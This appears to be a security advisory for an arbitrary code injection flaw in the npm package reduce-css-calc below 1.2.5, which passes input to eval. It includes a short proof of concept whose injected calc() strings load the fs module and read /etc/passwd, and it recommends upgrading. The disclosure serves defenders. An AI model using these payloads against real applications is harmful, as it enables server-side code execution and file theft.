Description
Arbitrary Code Injection in reduce-css-calc
Affected versions of reduce-css-calc pass their input directly to eval. If user-controlled input reaches the calc function, this can result in cross-site scripting (XSS) in the browser, or remote code execution on the server.
Proof of Concept
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
Recommendation
Update to version 1.2.5 or later.
Packages
Name                   Affected versions   Fixed version
reduce-css-calc (npm)  < 1.2.5             1.2.5
Related vulnerabilities
CVSS3: 6.1
nvd
more than 7 years ago
Arbitrary code execution is possible in reduce-css-calc node module <=1.2.4 through crafted CSS. This makes cross-site scripting (XSS) possible on the client and arbitrary code injection possible on the server when user input is passed to the `calc` function.